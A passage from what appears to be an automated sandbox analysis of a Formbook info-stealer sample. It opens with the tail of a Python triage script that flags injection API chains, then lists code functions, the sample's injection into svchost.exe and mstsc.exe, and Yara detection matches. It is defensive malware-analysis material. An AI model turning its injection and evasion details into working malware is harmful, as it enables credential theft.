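            "chains": flag_injection(set(nt_apis)),
            "ldr_thunk": "LdrInitializeThunk" in apis,
        }
    return report


if __name__ == "__main__":
    for key, info in triage(SAMPLE).items():
        print(key, info["chains"] or "no injection chain", "(LdrInitializeThunk tagged)" if info["ldr_thunk"] else "")
```

On the sample, svchost.exe matches all three chains, mstsc.exe only the context-hijack pair, and the AutoIt dropper none; feeding the full report text instead of `SAMPLE` gives the complete per-process picture. The chains are a triage aid, not proof: NtMapViewOfSection in particular is also used for ordinary local mapping, so a match is a prompt to look at the memory dumps the report lists under the Yara matches, not a verdict on its own.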
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DA279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_007DA279
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007C8638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007C8638
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007D5264
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0077E8000_2_0077E800
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079DAF50_2_0079DAF5
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0077E0600_2_0077E060
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007841400_2_00784140
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007923450_2_00792345
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007F04650_2_007F0465
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A64520_2_007A6452
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A25AE0_2_007A25AE
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079277A0_2_0079277A
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007868410_2_00786841
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007F08E20_2_007F08E2
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00788968
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007D8932
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007CE928
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007A890F
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007A69C4
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_0079CCA1
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007A6F36
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007870FE
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00783190
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00771287
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_0079F359
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00793307
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00791604
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00785680
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00797813
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007858C0
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00791AF8
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007A9C35
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_0077FE40
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007F7E0D
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_0079BF26
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00791F10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024A8563
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024BEB33
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024A0023
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0249E0A3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02493109
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02493110
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02492670
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0249FE03
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024A6743
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0249FDFC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F64750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03000591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F6E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F52E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F32FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FBEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F60F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F82F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F30CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F40C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F3ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F58DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5D2F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F4B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F85630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F31460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F85AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F7DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FAD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F49950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F49EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F03FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F03FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F41F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FFFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FB9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F5FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F43D40
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04602446
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045F4420
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045FE4F6
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04550535
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04610591
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0456C6E0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04574750
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04550770
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0454C7C0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045E2000
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045D8158
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045EA118
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04540100
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_046081CC
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_046041A2
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_046101AA
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045F0274
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045D02C0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460A352
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_046103E6
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0455E3F0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04550C00
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04540CF2
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045F0CB5
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045ECD1F
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0455AD00
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0454ADE0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04568DBF
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04550E59
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460EE26
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460EEDB
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04562E90
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460CE93
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045C4F40
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04570F30
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045F2F30
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04592F28
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04542FC8
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045CEFA0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04552840
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0455A840
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0457E8F0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045368B8
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04566962
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0461A9A6
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045529A0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0454EA80
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460AB40
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04606BD7
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04541460
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460F43F
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04607571
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_046195C3
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045ED5B0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04595630
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_046016CC
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460F7B0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460F0E0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_046070E9
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045FF0CC
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045570C0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0461B16B
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0453F172
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0458516C
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0455B1B0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0456B2C0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0456D2F0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045F12ED
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045552A0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0453D34C
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460132D
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0459739A
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045C9C32
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460FCF2
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04607D73
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04553D40
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04601D5A
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0456FDC0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04559EB0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460FF09
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04513FD2
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04513FD5
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04551F92
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460FFB1
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045BD800
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045538E0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04559950
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0456B950
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045E5910
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04607A46
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460FA49
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045C3A6C
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045FDAC6
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045EDAAC
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_04595AA0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045F1AA3
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0460FB76
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0458DBF9
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_045C5BF0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0456FB80
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00171B50
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0016CA79
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0016CA80
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0016CCA0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0016AD20
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_001751E0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_001733C0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0018B7B0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_042B540C
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_042AE495
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_042AE378
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_042B3F69
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_042AE833
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_042AD898
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_042ACA83
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_042ACB58
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F87E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FBF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F2B970 appears 262 times
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 04597E54 appears 107 times
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 045CF290 appears 103 times
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 0453B970 appears 262 times
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 04585130 appears 58 times
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 045BEA12 appears 86 times
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: String function: 00790C63 appears 70 times
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: String function: 00777F41 appears 35 times
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: String function: 00798A80 appears 42 times
Source: rP0n___87004354.exe, 00000000.00000003.1699565720.000000000432D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs rP0n___87004354.exe
Source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000039C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs rP0n___87004354.exe
Source: rP0n___87004354.exe, 00000000.00000003.1700702089.00000000039C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs rP0n___87004354.exe
Source: rP0n___87004354.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/4@11/8
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DA0F4 GetLastError,FormatMessageW
